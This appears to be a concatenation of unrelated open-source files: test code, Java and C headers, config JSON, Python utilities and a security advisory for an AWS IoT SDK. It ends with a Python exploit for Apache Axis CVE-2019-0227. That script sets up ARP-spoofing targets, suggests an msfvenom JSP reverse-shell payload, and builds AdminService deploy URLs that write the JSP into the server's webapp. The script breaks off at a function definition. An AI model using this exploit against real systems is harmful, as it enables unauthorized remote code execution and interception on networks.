    self.expect("trace schema intel-pt", substrs=["trace", "triple", "threads", "traceFile"])

  def testInvalidPluginSchema(self):
    """Asking for an unknown plug-in's schema yields an error message."""
    self.expect("trace schema invalid-plugin", error=True,
        substrs=['error: no trace plug-in matches the specified type: "invalid-plugin"'])

  def testAllSchemas(self):
    """``trace schema all`` includes the intel-pt schema fragment verbatim."""
    self.expect("trace schema all", substrs=['''{
  "trace": {
    "type": "intel-pt",
    "cpuInfo": {
      "vendor": "intel" | "unknown",
      "family": integer,
      "model": integer,
      "stepping": integer
    }
  },'''])
| 336 |
862 | <filename>lock-api-objects/src/main/java/com/palantir/lock/LockGroupBehavior.java
/*
* (c) Copyright 2018 Palantir Technologies Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.palantir.lock;
/**
* Defines the behavior that the lock server takes when some of the requested locks
* cannot be acquired.
*
* @author jtamer
*/
public enum LockGroupBehavior {
/**
* Instructs the lock server to acquire as many of the requested locks as
* possible.
*/
LOCK_AS_MANY_AS_POSSIBLE,
/**
* Instructs the lock server to not acquire any of the locks unless they can
* all be acquired. This is the default behavior.
*/
LOCK_ALL_OR_NONE;
}
| 369 |
6,272 | <reponame>DuncanFaulkner/flex-layout
{
"ChromeHeadlessLocal": {
"base": "ChromeHeadless",
"flags": ["--window-size=1024,768"]
},
"ChromeHeadlessCI": {
"base": "ChromeHeadless",
"flags": ["--window-size=1024,768", "--no-sandbox"]
},
"FirefoxHeadless": {
"base": "Firefox",
"flags": ["-headless"]
},
"SAUCELABS_IOS14": {
"base": "SauceLabs",
"appiumVersion": "1.20.1",
"deviceOrientation": "portrait",
"browserName": "Safari",
"platformVersion": "14.3",
"platformName": "iOS",
"deviceName": "iPhone 12 Pro Simulator"
},
"BROWSERSTACK_SAFARI13": {
"base": "BrowserStack",
"browser": "Safari",
"browser_version": "13.1",
"os": "OS X",
"os_version": "Catalina"
}
}
| 339 |
521 | <filename>third_party/virtualbox/src/VBox/Additions/x11/x11include/XFree86-4.3/X11/extensions/shapestr.h<gh_stars>100-1000
/************************************************************
Copyright 1989, 1998 The Open Group
Permission to use, copy, modify, distribute, and sell this software and its
documentation for any purpose is hereby granted without fee, provided that
the above copyright notice appear in all copies and that both that
copyright notice and this permission notice appear in supporting
documentation.
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
OPEN GROUP BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of The Open Group shall not be
used in advertising or otherwise to promote the sale, use or other dealings
in this Software without prior written authorization from The Open Group.
********************************************************/
/* $Xorg: shapestr.h,v 1.4 2001/02/09 02:03:24 xorgcvs Exp $ */
#ifndef _SHAPESTR_H_
#define _SHAPESTR_H_
/*
* Protocol requests constants and alignment values
* These would really be in SHAPE's X.h and Xproto.h equivalents
*/
#include "shape.h"
#define Window CARD32
#define Time CARD32
#define SHAPENAME "SHAPE"
#define SHAPE_MAJOR_VERSION 1 /* current version numbers */
#define SHAPE_MINOR_VERSION 0
typedef struct _ShapeQueryVersion {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeQueryVersion */
CARD16 length B16;
} xShapeQueryVersionReq;
#define sz_xShapeQueryVersionReq 4
typedef struct {
BYTE type; /* X_Reply */
CARD8 unused; /* not used */
CARD16 sequenceNumber B16;
CARD32 length B32;
CARD16 majorVersion B16; /* major version of SHAPE protocol */
CARD16 minorVersion B16; /* minor version of SHAPE protocol */
CARD32 pad0 B32;
CARD32 pad1 B32;
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
} xShapeQueryVersionReply;
#define sz_xShapeQueryVersionReply 32
typedef struct _ShapeRectangles {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeRectangles */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 ordering; /* UnSorted, YSorted, YXSorted, YXBanded */
CARD8 pad0; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
} xShapeRectanglesReq; /* followed by xRects */
#define sz_xShapeRectanglesReq 16
typedef struct _ShapeMask {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeMask */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD16 junk B16; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
CARD32 src B32; /* 1 bit pixmap */
} xShapeMaskReq;
#define sz_xShapeMaskReq 20
typedef struct _ShapeCombine {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeCombine */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 srcKind; /* ShapeBounding or ShapeClip */
CARD8 junk; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
Window src B32;
} xShapeCombineReq;
#define sz_xShapeCombineReq 20
typedef struct _ShapeOffset {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeOffset */
CARD16 length B16;
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 junk1; /* not used */
CARD16 junk2 B16; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
} xShapeOffsetReq;
#define sz_xShapeOffsetReq 16
typedef struct _ShapeQueryExtents {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeQueryExtents */
CARD16 length B16;
Window window B32;
} xShapeQueryExtentsReq;
#define sz_xShapeQueryExtentsReq 8
typedef struct {
BYTE type; /* X_Reply */
CARD8 unused; /* not used */
CARD16 sequenceNumber B16;
CARD32 length B32; /* 0 */
CARD8 boundingShaped; /* window has bounding shape */
CARD8 clipShaped; /* window has clip shape */
CARD16 unused1 B16;
INT16 xBoundingShape B16; /* extents of bounding shape */
INT16 yBoundingShape B16;
CARD16 widthBoundingShape B16;
CARD16 heightBoundingShape B16;
INT16 xClipShape B16; /* extents of clip shape */
INT16 yClipShape B16;
CARD16 widthClipShape B16;
CARD16 heightClipShape B16;
CARD32 pad1 B32;
} xShapeQueryExtentsReply;
#define sz_xShapeQueryExtentsReply 32
typedef struct _ShapeSelectInput {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeSelectInput */
CARD16 length B16;
Window window B32;
BYTE enable; /* xTrue -> send events */
BYTE pad1;
CARD16 pad2 B16;
} xShapeSelectInputReq;
#define sz_xShapeSelectInputReq 12
typedef struct _ShapeNotify {
BYTE type; /* always eventBase + ShapeNotify */
BYTE kind; /* either ShapeBounding or ShapeClip */
CARD16 sequenceNumber B16;
Window window B32;
INT16 x B16;
INT16 y B16; /* extents of new shape */
CARD16 width B16;
CARD16 height B16;
Time time B32; /* time of change */
BYTE shaped; /* set when a shape actual exists */
BYTE pad0;
CARD16 pad1 B16;
CARD32 pad2 B32;
CARD32 pad3 B32;
} xShapeNotifyEvent;
#define sz_xShapeNotifyEvent 32
typedef struct _ShapeInputSelected {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeInputSelected */
CARD16 length B16;
Window window B32;
} xShapeInputSelectedReq;
#define sz_xShapeInputSelectedReq 8
typedef struct {
BYTE type; /* X_Reply */
CARD8 enabled; /* current status */
CARD16 sequenceNumber B16;
CARD32 length B32; /* 0 */
CARD32 pad1 B32; /* unused */
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
CARD32 pad5 B32;
CARD32 pad6 B32;
} xShapeInputSelectedReply;
#define sz_xShapeInputSelectedReply 32
typedef struct _ShapeGetRectangles {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeGetRectangles */
CARD16 length B16;
Window window B32;
CARD8 kind; /* ShapeBounding or ShapeClip */
CARD8 junk1;
CARD16 junk2 B16;
} xShapeGetRectanglesReq;
#define sz_xShapeGetRectanglesReq 12
typedef struct {
BYTE type; /* X_Reply */
CARD8 ordering; /* UnSorted, YSorted, YXSorted, YXBanded */
CARD16 sequenceNumber B16;
CARD32 length B32; /* not zero */
CARD32 nrects B32; /* number of rectangles */
CARD32 pad1 B32;
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
CARD32 pad5 B32;
} xShapeGetRectanglesReply; /* followed by xRectangles */
#define sz_xShapeGetRectanglesReply 32
#undef Window
#undef Time
#endif /* _SHAPESTR_H_ */
| 2,751 |
775 | <reponame>ntyukaev/training_extensions<gh_stars>100-1000
# Copyright (C) 2021-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
This module contains the different ui rules elements, Rule and UIRules. They are used to define rules for disabling
configuration parameters in the ui, conditional on the value of other parameters.
"""
from __future__ import annotations
from typing import Callable, List, Optional, Union
from attr import asdict, attrib, attrs, setters
from ote_sdk.configuration.elements.utils import attr_enum_to_str_serializer
from ote_sdk.configuration.enums.config_element_type import ConfigElementType
from .types import Action, Operator
from .utils import attr_convert_action, attr_convert_operator
ALLOWED_RULE_VALUE_TYPES = Union[int, str, float, bool] # pylint: disable=invalid-name
@attrs(auto_attribs=True)
class Rule:
    """
    A single condition: apply ``operator`` to compare the current ``value`` of the
    configurable parameter identified by ``parameter``. The parameter is addressed
    either by name or, for nested configurations, by a list of attribute names
    forming the path to it.
    """

    parameter: Union[str, List[str]]
    value: ALLOWED_RULE_VALUE_TYPES
    operator: Operator = attrib(
        default=Operator.EQUAL_TO, converter=attr_convert_operator
    )
    type: ConfigElementType = attrib(
        default=ConfigElementType.RULE, on_setattr=setters.frozen
    )

    def to_dict(self, enum_to_str: bool = True) -> dict:
        """
        Serialize this Rule to its dictionary representation.

        :param enum_to_str: Set to True to convert Enum instances to their string representation
        :return: dictionary representation of this Rule
        """
        serializer: Optional[Callable] = (
            attr_enum_to_str_serializer if enum_to_str else None
        )
        return asdict(self, value_serializer=serializer)
@attrs(auto_attribs=True)
class UIRules:
    """
    Combines Rule elements with boolean logic. Attached to a configurable
    parameter, the ``rules`` are evaluated and joined by ``operator``; when the
    combined result is True, the UI performs ``action`` on that parameter.

    For nested UIRules, only the ``action`` of the outermost instance applies.
    """

    rules: List[Union[Rule, UIRules]] = attrib(kw_only=True)
    operator: Operator = attrib(default=Operator.AND, converter=attr_convert_operator)
    action: Action = attrib(
        default=Action.DISABLE_EDITING, converter=attr_convert_action
    )
    type: ConfigElementType = attrib(
        default=ConfigElementType.UI_RULES, on_setattr=setters.frozen
    )

    def add_rule(self, rule: Union[Rule, UIRules]):
        """Appends ``rule`` to this instance's rule list."""
        self.rules.append(rule)

    def to_dict(self, enum_to_str: bool = True) -> dict:
        """
        Serialize this UIRules instance (recursing into nested rules) to its
        dictionary representation.

        :param enum_to_str: Set to True to convert Enum instances to their string representation
        :return: dictionary representation of this UIRules instance
        """
        serializer: Optional[Callable] = (
            attr_enum_to_str_serializer if enum_to_str else None
        )
        serialized_rules = [rule.to_dict(enum_to_str) for rule in self.rules]
        dictionary_representation = asdict(self, value_serializer=serializer)
        dictionary_representation.update({"rules": serialized_rules})
        return dictionary_representation
@attrs
class NullUIRules(UIRules):
    """
    This class represents an empty, unset UIRules element.

    Presumably serves as a null-object default so callers need not handle
    ``None`` — confirm against usage sites.
    """
    # Overrides the parent's keyword-only, defaultless `rules` with an empty-list default.
    rules: List[Union[Rule, UIRules]] = attrib(factory=list)
| 1,394 |
3,631 | /*
* Copyright 2021 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.drools.verifier.core.checks;
import java.util.Comparator;
import java.util.Objects;
/**
 * Wraps a {@link Comparable} value and extends its natural ordering with explicit
 * negative/positive infinity bounds ({@link #MIN_VALUE}, {@link #MAX_VALUE}).
 * Among normal wrappers, a wrapped {@code null} orders before any non-null value.
 */
public class ComparableWrapper
        implements Comparable<ComparableWrapper> {

    /** Orders before every other wrapper, including one wrapping {@code null}. */
    public static final ComparableWrapper MIN_VALUE = new ComparableWrapper(null, Type.NEGATIVE_INFINITE);

    /** Orders after every other wrapper. */
    public static final ComparableWrapper MAX_VALUE = new ComparableWrapper(null, Type.INFINITE);

    // Declaration order defines the ordering used by compareTo for non-NORMAL types.
    enum Type {
        NEGATIVE_INFINITE,
        NORMAL,
        INFINITE
    }

    private final Comparable value;
    private final Type type;

    /** Wraps {@code value} (which may be {@code null}) as a normal, finite element. */
    public ComparableWrapper(final Comparable value) {
        this(value, Type.NORMAL);
    }

    private ComparableWrapper(final Comparable value,
                              final Type type) {
        this.value = value;
        this.type = type;
    }

    @Override
    public int compareTo(final ComparableWrapper other) {
        // If either side is an infinity, the Type enum ordering alone decides;
        // only two NORMAL wrappers fall through to comparing wrapped values.
        if (!Objects.equals(type, Type.NORMAL) || !Objects.equals(other.type, Type.NORMAL)) {
            return type.compareTo(other.type);
        }
        final Comparator<Comparable> nullFirstCompare = Comparator.nullsFirst(Comparable::compareTo);
        return nullFirstCompare.compare(value, other.value);
    }

    /** Returns the wrapped value; {@code null} for the infinity constants. */
    public Comparable getValue() {
        return value;
    }
}
567 | package com.google.cloud.bigquery.utils.queryfixer.util;
import com.google.cloud.bigquery.utils.queryfixer.entity.Position;
import com.google.cloud.bigquery.utils.queryfixer.entity.StringView;
import lombok.AllArgsConstructor;
import lombok.NonNull;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
* A helper class that provides static methods to extract substrings from a string based on regular
* expression.
*/
@AllArgsConstructor
public class PatternMatcher {

  private static final String POSITION_REGEX = "\\[(.*?):(.*?)\\]";
  // Compiled once and reused: Pattern compilation is comparatively expensive and
  // POSITION_REGEX never changes. Pattern instances are thread-safe.
  private static final Pattern POSITION_PATTERN = Pattern.compile(POSITION_REGEX);

  /**
   * Check if a string matches a regular expression
   *
   * @param source the string to match
   * @param regex regular expression
   * @return true if it is matched else false.
   */
  public static boolean isMatched(@NonNull String source, @NonNull String regex) {
    Pattern pattern = Pattern.compile(regex);
    Matcher matcher = pattern.matcher(source);
    return matcher.find();
  }

  /**
   * Extract substrings from a string based on regular expression. Only the grouped items will be
   * extracted. A group item is enclosed by a pair of parentheses `()`. The sequence of the
   * extracted substrings are determined by the position of their left parenthesis. For more
   * details, please read {@link Pattern}. If a pattern is not matched in the input string, a null
   * pointer will be returned.
   *
   * @param source the string to match
   * @param regex regular expression
   * @return a list of extracted substrings or null pointer.
   */
  public static List<String> extract(@NonNull String source, @NonNull String regex) {
    Pattern pattern = Pattern.compile(regex);
    Matcher matcher = pattern.matcher(source);
    if (!matcher.find()) {
      return null;
    }
    // Group 0 is the whole match, so capture groups start at index 1.
    List<String> contents = new ArrayList<>();
    for (int i = 1; i <= matcher.groupCount(); i++) {
      contents.add(matcher.group(i));
    }
    return contents;
  }

  /**
   * Find all the substrings that matches a regex in a string.
   *
   * @param source string to be matched.
   * @param regex regex to match substring
   * @return A list of {@link StringView}, one per (non-overlapping) match; empty if none.
   */
  public static List<StringView> findAllSubstrings(
      @NonNull String source, @NonNull String regex) {
    Pattern pattern = Pattern.compile(regex);
    Matcher matcher = pattern.matcher(source);
    List<StringView> stringViews = new ArrayList<>();
    while (matcher.find()) {
      stringViews.add(StringView.of(source, matcher.start(), matcher.end()));
    }
    return stringViews;
  }

  /**
   * Extract the position information from a string like [x:y], where x and y are row and column
   * numbers.
   *
   * @param posStr a string like [x:y]
   * @return Position represented by the string, or null if the pattern does not match
   */
  public static Position extractPosition(String posStr) {
    Matcher matcher = POSITION_PATTERN.matcher(posStr);
    if (!matcher.find()) {
      return null;
    }
    int rowNum = Integer.parseInt(matcher.group(1));
    int colNum = Integer.parseInt(matcher.group(2));
    return new Position(rowNum, colNum);
  }
}
| 1,011 |
995 | <gh_stars>100-1000
#include "ExponentialBackoffTimer.hpp"
using namespace HomieInternals;
// Constructs an inactive backoff timer.
// `initialInterval`: base delay for the first interval (units are whatever
//   Timer::setInterval expects — presumably milliseconds; TODO confirm).
// `maxBackoff`: cap on the internal retry counter that scales the delay.
ExponentialBackoffTimer::ExponentialBackoffTimer(uint16_t initialInterval, uint8_t maxBackoff)
  : _timer(Timer())
  , _initialInterval(initialInterval)
  , _maxBackoff(maxBackoff)
  , _retryCount(0) {
  _timer.deactivate();  // start inactive; activate() arms the first interval
}
// Returns true exactly when the underlying timer has fired, and in that case
// re-arms it with the next (longer) interval. The delay grows quadratically
// with the retry count (pow(_retryCount, 2) * _initialInterval, counter capped
// at _maxBackoff) minus a random jitter of up to ~10% so that multiple devices
// do not retry in lock-step.
bool ExponentialBackoffTimer::check() {
  if (_timer.check()) {
    if (_retryCount != _maxBackoff) _retryCount++;  // cap growth of the delay
    uint32_t fixedDelay = pow(_retryCount, 2) * _initialInterval;  // quadratic, despite the class name
    uint32_t randomDifference = random(0, (fixedDelay / 10) + 1);  // jitter: 0..10% of fixedDelay
    uint32_t nextInterval = fixedDelay - randomDifference;
    _timer.setInterval(nextInterval, false);
    return true;
  } else {
    return false;
  }
}
// Arms the timer with the initial interval and resets the backoff schedule.
// No-op if the timer is already running, so repeated calls do not restart
// an in-progress countdown.
void ExponentialBackoffTimer::activate() {
  if (_timer.isActive()) return;

  _timer.setInterval(_initialInterval, false);
  _timer.activate();
  _retryCount = 1;  // check() increments before computing the next delay
}
void ExponentialBackoffTimer::deactivate() {
_timer.deactivate();
}
bool ExponentialBackoffTimer::isActive() const {
return _timer.isActive();
}
| 368 |
6,304 | <filename>experimental/sktext/src/VisualRun.cpp
// Copyright 2021 Google LLC.
#include "experimental/sktext/src/VisualRun.h"
namespace skia {
namespace text {
} // namespace text
} // namespace skia
| 65 |
329 | from collections.abc import Callable
import pytest
from rest_framework import renderers
from rest_framework import request as rest_request
from rest_framework import serializers
from rest_framework.compat import uritemplate
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.serializers import Serializer
from rest_framework.test import APIRequestFactory
from rest_registration.api import views
from rest_registration.decorators import api_view_serializer_class_getter
from tests.helpers.api_views import rest_framework_version_info # noqa: F401
class ExampleSerializer(Serializer): # pylint: disable=abstract-method
test_field = serializers.CharField()
@pytest.fixture()
def decorator():
return api_view_serializer_class_getter(lambda: ExampleSerializer)
@pytest.fixture()
def input_post_view():
return (api_view(['POST']))(dummy_view_func)
@pytest.fixture()
def input_put_view():
return (api_view(['PUT']))(dummy_view_func)
def test_success(input_post_view, decorator):
output_view = decorator(input_post_view)
assert isinstance(output_view, Callable)
wrapper_cls = _get_view_class(output_view)
assert wrapper_cls.get_serializer_class() == ExampleSerializer
assert isinstance(wrapper_cls.get_serializer(), ExampleSerializer)
@pytest.mark.skipif(
'rest_framework_version_info < (3, 10, 0)'
' or rest_framework_version_info >= (3, 12, 0)')
def test_default_schema_success(input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
operation = schema.get_operation('/api/dummy-view/', 'POST')
operation_schema = operation['requestBody']['content']['application/json']['schema']
expected_operation_schema = {
'properties': {
'test_field': {'type': 'string'},
},
'required': ['test_field'],
}
assert operation_schema == expected_operation_schema
@pytest.mark.skipif('rest_framework_version_info < (3, 10, 0)')
def test_coreapi_autoschema_success(
settings_with_coreapi_autoschema, input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
# Ensure that get_link works properly with coreapi AutoSchema
assert uritemplate is not None
link = schema.get_link('/api/dummy-view/', 'POST', None)
assert len(link.fields) == 1
assert link.fields[0].name == 'test_field'
assert link.fields[0].required
@pytest.mark.skipif('rest_framework_version_info >= (3, 10, 0)')
def test_default_schema_success_deprecated(input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
# Ensure that get_link works properly with coreapi AutoSchema
assert uritemplate is not None
link = schema.get_link('/api/dummy-view/', 'POST', None)
assert len(link.fields) == 1
assert link.fields[0].name == 'test_field'
assert link.fields[0].required
def test_not_a_view(decorator):
with pytest.raises(Exception):
decorator(dummy_view_func)
def test_browsable_renderer_put_render(input_put_view, decorator):
    """
    Test that the PUT method works with ``BrowsableAPIRenderer``.

    This was broken in the past because ``_get_serializer`` did not
    accept the ``instance`` parameter.
    """
    data = {'blah': 'blah'}
    method = 'PUT'
    request = rest_request.Request(APIRequestFactory().get('blah'))
    output_view = decorator(input_put_view)
    wrapper_cls = _get_view_class(output_view)
    test_view_instance = wrapper_cls()
    # Minimal renderer setup: get_raw_data_form reads these attributes directly.
    renderer = renderers.BrowsableAPIRenderer()
    renderer.accepted_media_type = None
    renderer.renderer_context = {}
    response = renderer.get_raw_data_form(
        data, test_view_instance, method, request,
    )
    # An empty form body means rendering succeeded without raising.
    assert response.data == {}
def test_views_serializer_getter_returns_correct_value():
view_list = [
v for k, v in vars(views).items() if not k.startswith('_')]
for view in view_list:
serializer = view.cls.get_serializer()
assert isinstance(serializer, Serializer)
def dummy_view_func(request):
return Response()
def _get_view_class(view):
return view.cls
| 1,583 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Taillecourt","circ":"4ème circonscription","dpt":"Doubs","inscrits":826,"abs":428,"votants":398,"blancs":21,"nuls":12,"exp":365,"res":[{"nuance":"REM","nom":"<NAME>","voix":211},{"nuance":"FN","nom":"<NAME>","voix":154}]} | 109 |
404 | <gh_stars>100-1000
//
// AppDelegate.h
// TFEasyCoderDemo
//
// Created by ztf on 16/10/28.
// Copyright © 2016年 ztf. All rights reserved.
//
#import <UIKit/UIKit.h>
/// Application delegate; owns the app's main window.
@interface AppDelegate : UIResponder <UIApplicationDelegate>

/// The application's key window (retained for the app's lifetime).
@property (strong, nonatomic) UIWindow *window;

@end
| 114 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-c4rh-4376-gff4",
"modified": "2021-12-03T15:22:02Z",
"published": "2021-11-24T21:12:04Z",
"aliases": [
"CVE-2021-40830"
],
"summary": "Improper certificate management in AWS IoT Device SDK v2",
"details": "The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.0"
}
]
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "aws-iot-device-sdk-v2"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
]
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "awsiotsdk"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.1"
}
]
}
]
}
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40830"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-cpp-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-java-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-js-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-python-v2"
},
{
"type": "WEB",
"url": "https://github.com/awslabs/aws-c-io/"
}
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"severity": "MODERATE",
"github_reviewed": true
}
} | 1,967 |
489 | <gh_stars>100-1000
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Apache Axis 1.4 Remote Code Execution CVE-2019-0227 #
#https://rhinosecuritylabs.com/Application-Security/CVE-2019-0227-Expired-Domain-to-RCE-in-Apache-Axis #
# Author: <NAME> @daveysec, Rhino Security Labs #
# This exploits Apache Axis < 1.4 to upload and execute a JSP payload using MITM #
# by forcing an http request using the default StockQuoteService.jws service. #
# You need to be on the same network as the Axis server to make this work. #
# A lot of this exploit is based on the research from: #
# https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
import SimpleHTTPServer
import SocketServer
import subprocess
from time import sleep
import thread
import requests
from urllib import quote_plus
import sys
#Usage: python CVE-2019-0227.py shell.jsp
#You need to change these variable to match your configuration
myip = "192.168.0.117" #IP of your machine
target = "192.168.0.102" #IP of target
gateway = "192.168.0.1" #default gateway
targetport = "8080" #Port of target running axis (probably 8080)
pathtoaxis = "http://192.168.0.102:8080/axis" #This can be custom depending on the Axis install, but this is default
spoofinterface = "eth0" #Interface for arpspoofing
jspwritepath = "webapps\\axis\\exploit.jsp" #relative path on the target to write the JSP payload This is the default on a Tomcat install
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
payloadfile = open(sys.argv[1],'r').read() #Some file containing a JSP payload
#craft URL to deploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
deployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22+provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler+type%3D%22RandomLog%22%2F%3E%3C%2FrequestFlow%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22+%3E%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22'+quote_plus(jspwritepath)+'%22+%2F%3E%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22+%2F%3E%3C%2Fhandler%3E%3C%2Fns1%3Adeployment'
#craft URL to undeploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
undeployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Aundeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22%2F%3E%3C%2Fns1%3Aundeployment'
def CreateJsp(pathtoaxis,jsppayload):
